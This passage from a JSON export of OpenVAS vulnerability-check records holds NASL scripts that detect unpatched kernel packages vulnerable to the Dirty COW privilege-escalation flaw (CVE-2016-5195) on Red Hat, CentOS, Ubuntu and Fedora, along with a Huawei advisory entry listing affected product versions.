7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2098-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-October/msg00049.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~327.36.3.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:45:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "In the morning of October 21th, 2016, a 
security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel.", "modified": "2020-06-06T00:00:00", "published": "2020-06-05T00:00:00", "id": "OPENVAS:1361412562310108768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108768", "type": "openvas", "title": "Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108768\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5195\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Dirty COW Vulnerability in Huawei Products (huawei-sa-20161207-01-dirtycow)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel.\");\n\n script_tag(name:\"insight\", value:\"In the morning of October 21th, 2016, a security researcher Phil Oester disclosed a local privilege escalation vulnerability in Linux kernel. A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could exploit this vulnerability to gain write access to otherwise read-only memory mappings and thus obtain the highest privileges on the system. 
(Vulnerability ID: HWPSIRT-2016-10050)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2016-5195.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to escalate the privilege levels to obtain administrator privilege.\");\n\n script_tag(name:\"affected\", value:\"5288 V3 versions V100R003C00\n\n9032 versions V100R001C00 V100R001C00SPC101 V100R001C00SPC200\n\nAC6605 versions V200R006C00\n\nAgile Controller-Campus versions V100R002C00 V100R002C10 V100R002C10SPC400 V100R002C10SPC403\n\nAustin versions V100R001C10B290 V100R001C10B680 V100R001C20B110 V100R001C30 V100R001C50\n\nBH620 V2 versions V100R002C00\n\nBH621 V2 versions V100R002C00\n\nBH622 V2 versions V100R002C00\n\nBH640 V2 versions V100R002C00\n\nBalong GU versions V800R200C50B200 V800R200C55B200\n\nBalong GUL versions V700R110C30 V700R110C31 V700R200C00 V700R220C30 V700R500C30 V700R500C31\n\nCAM-L21 versions Versions earlier than C576B130\n\nCH121 V3 versions V100R001C00\n\nCH140 V3 versions V100R001C00\n\nCH220 V3 versions V100R001C00\n\nCH222 V3 versions V100R001C00\n\nCH225 V3 versions V100R001C00\n\nCH226 V3 versions V100R001C00\n\nCarrier-eLog versions V200R003C10\n\nChicago versions V100R001C10\n\nCloudOpera CSM versions SysTool(OSUpgrade)V200R016C10SPC100 SysTool(OSUpgrade)V200R016C10SPC100B021 V200R016C10SPC600\n\nDallas versions V100R001C10\n\nE5573Cs-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5573s-320 versions TCPU-V200R001B180D11SP00C00\n\nE5673s-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5771s-856 versions Versions earlier than TCPU-V200R001B329D07SP00C00\n\nE5878s-32 versions TCPU-V200R001B280D01SP05C00\n\nE6000 Chassis versions V100R001C00\n\nEnterprise Service Solution EIDC versions V100R001C60\n\nFusionCompute versions V100R003C10SPC600 V100R005C00 
V100R005C10 V100R005C10U1_B1075917\n\nFusionCube versions V100R002C60RC1\n\nFusionManager versions V100R003C00 V100R003C10 V100R005C00 V100R005C00SPC100 V100R005C00SPC200 V100R005C00SPC300 V100R005C10 V100R005C10SPC300 V100R005C10SPC500 V100R005C10SPC700 V100R005C10SPC703 V100R005C10SPC720T V100R005C10U1_B1075133 V100R005C10U2\n\nFusionStorage Block versions V100R003C00 V100R003C02 V100R003C30\n\nFusionStorage Object versions V100R002C00 V100R002C01\n\nHiDPTAndroid versions V200R001C00 V300R001C00\n\nHiSTBAndroid versions V600R003C00SPC010\n\nHuawei solutions for SAP HANA versions V100R001C00\n\nIPC6122-D versions V100R001C10\n\nIPC6611-Z30-I versions V100R001C00\n\nKII-L21 versions C10B130CUSTC10D003 C185B130CUSTC185D002 C185B140CUSTC185D004 C636B310CUSTC636D001 OTA-C02B131CUSTC02D002 OTA-C185B140CUSTC185D004 OTA-C185B310CUSTC185D004 OTA-C636B140CUSTC636D004 OTA-C636B310CUSTC636D001 OTA-C636B320CUSTC636D001 Versions earlier than C02B140CUSTC02D001 Versions earlier than C10B150CUSTC10D003 Versions earlier than C185B321CUSTC185D001 Versions earlier than C464B140 Versions earlier than C629B140CUSTC629D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B330CUSTC636D002 Versions earlier than C900B130 Versions earlier than C96B140CUSTC96D004\n\nL2800 versions V100R001C00SPC200\n\nLogCenter versions V100R001C10\n\nNEM-AL10 versions Versions earlier than C00B355\n\nNMO-L22 versions Versions earlier than C569B150\n\nOTA- versions KII-L21C636B150CUSTC636D005\n\nOceanStor 18500 versions V100R001C10\n\nOceanStor 18500 V3 versions V300R003C10\n\nOceanStor 18800 V3 versions V300R003C00\n\nOceanStor 5600 V3 versions V300R003C00 V300R003C10\n\nOceanStor Backup Software versions V100R002C00 V100R002C00LHWS01_P385795 V100R002C00SPC200 V200R001C00 V200R001C00SPC200\n\nOceanStor CSE versions V100R001C01SPC103 V100R001C01SPC106 V100R001C01SPC109 V100R001C01SPC112 
V100R002C00LSFM01CP0001 V100R002C00LSFM01SPC101 V100R002C00LSFM01SPC102 V100R002C00LSFM01SPC106\n\nOceanStor HDP3500E versions V100R002C00 V100R003C00\n\nOceanStor HVS85T versions V100R001C00 V100R001C10 V100R001C30\n\nOceanStor HVS88T versions V100R001C00\n\nOceanStor N8500 versions V200R001C09 V200R001C91 V200R001C91SPC900\n\nOceanStor Onebox versions V100R003C10\n\nOceanStor ReplicationDirector versions V200R001C00\n\nOnebox Solution versions V100R005C00 V1R5C00RC2\n\nRH1288 V2 versions V100R002C00\n\nRH1288 V3 versions V100R003C00\n\nRH1288A V2 versions V100R002C00\n\nRH2285 V2 versions V100R002C00\n\nRH2285H V2 versions V100R002C00\n\nRH2288 V2 versions V100R002C00\n\nRH2288 V3 versions V100R003C00\n\nRH2288A V2 versions V100R002C00\n\nRH2288E V2 versions V100R002C00\n\nRH2288H V2 versions V100R002C00\n\nRH2288H V3 versions V100R003C00\n\nRH2485 V2 versions V100R002C00\n\nRH5885 V3 versions V100R003C01 V100R003C10\n\nRH5885H V3 versions V100R003C00 V100R003C10\n\nRH8100 V3 versions V100R003C00\n\nV1300N versions V100R002C02\n\nVCM versions V100R001C00 V100R001C10 V100R001C20\n\nVIE-L29 versions Versions earlier than C185B384 Versions earlier than C605B370\n\nX6000 versions V100R002C00\n\nX6800 versions V100R003C00\n\neCloud CC versions V100R001C01LSHU01\n\neLog versions V200R003C10 V200R003C20\n\neOMC910 versions V100R003C00\n\neSight versions V300R003C20 V300R005C00SPC200\n\neSight Network versions V300R006C00 V300R007C00\n\neSpace 8950 versions V200R003C00\n\neSpace IPC versions V100R001C21 V200R001C01 V200R001C02\n\neSpace VCN3000 versions V100R001C01 V100R002C00 V100R002C10 V100R002C20\n\ninCloud Eye versions V200R001C21 V200R001C30\n\ninCloud Payment versions V200R001C30\n\ninCloud Shield versions V200R001C30\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", 
value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161207-01-dirtycow-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310882583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882583", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:2098 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:2098 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882583\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 05:00:35 +0200 (Wed, 26 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:2098 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the\nLinux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory\nmappings. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2098\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-October/022133.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.36.3.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842924", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842924", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3106-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-xenial USN-3106-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as 
published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842924\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:05 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3106-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3106-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS\n for Ubuntu 14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of\nthe Linux kernel when handling copy-on-write breakage of private read-only\nmemory mappings. 
A local attacker could use this to gain administrative\nprivileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-generic-lpae\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-lowlatency\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-e500mc\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc-smp\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-emb\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-45-powerpc64-smp\", ver:\"4.4.0-45.66~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-07T00:00:00", "id": "OPENVAS:1361412562310871972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871972", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-c8a0c7eece", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c8a0c7eece\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871972\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:22:15 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c8a0c7eece\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c8a0c7eece\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWMDLBWMGZKFHMRJ7QUQVCERP5QHDB6W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.3~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310842974", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842974", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-3107-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-3107-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
